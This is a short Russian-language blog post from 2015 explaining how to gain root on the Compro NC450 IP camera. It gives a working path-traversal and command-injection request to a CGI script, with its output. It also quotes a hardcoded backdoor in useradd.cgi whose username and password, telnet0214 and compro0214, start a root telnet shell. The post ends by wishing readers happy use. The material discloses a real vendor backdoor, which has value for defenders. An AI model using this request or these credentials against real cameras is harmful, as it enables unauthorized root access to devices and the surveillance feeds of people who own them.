понедельник, 13 июля 2015 г.

Получение root на IP камере Compro NC450


Путем несложных действий можно получить как доступ к файловой системе IP камеры Compro NC450, так и root через Telnet.
Судя по всему, создатели камеры не сильно озаботились безопасностью устройства и оставили CGI уязвимость для нас (или для себя):
Выполнив следующий HTTP GET запрос:
"http://<camera IP>/cgi-bin/recording/download.cgi?ch=0&attach=../../../../bin/echo%20/etc/motd
в ответе мы получим Message of the day:
Content-Disposition: attachment; filename="../../../../bin/echo "your hax0red h0 h0" >> /etc/motd"
Content-Transfer-Encoding: binary

cat: /web/html/cgi-bin/recording/save0/record0/../../../../bin/echo: No such file or directory
cat: "your: No such file or directory
cat: hax0red: No such file or directory
cat: h0: No such file or directory
cat: h0": No such file or directory
cat: >>: No such file or directory
Welcome to

    _____    __      ___       __     ___       _     _    _
   |  ___|  /  \    / __ \    /  \   |  _ \    /  \   \ \ / /
   | |___  / /\ \  | /__\ \  / /\ \  | | \ |  / /\ \   \ V /
   |  ___|| |__| | |  _   / | |__| | | | | | | |__| |   \ /
   | |    |  __  | | |  \ \ |  __  | | |_/ / |  __  |   | |
   |_|    |_|  |_| |_|   \_\|_|  |_| |___ /  |_|  |_|   |_|

For further information check:
http://www.GM.com/
Путем несложных исследований файловой системы устройства было обнаружено, что скрипт добавления нового пользователя камеры useradd.cgi содержит бэкдор, запускающий Telnet сервер:
if [ $USERNAME = "telnet0214" ]; then
if [ $PASSWD2 = "compro0214" ]; then
/bin/busybox telnetd -l /bin/sh
echo "<script type=\"text/javascript\">"
echo " alert('Telnet started!');"
echo "  window.close();"
echo "</script>"
bCreate="no"
fi
fi
Т.е. чтобы запустить Telnet, достаточно зайти на страничку управления пользователями в WEB интерфейсе камеры и добавить пользователя с логином telnet0214 и паролем compro0214.

Удачного использования :)






Комментариев нет:

Отправить комментарий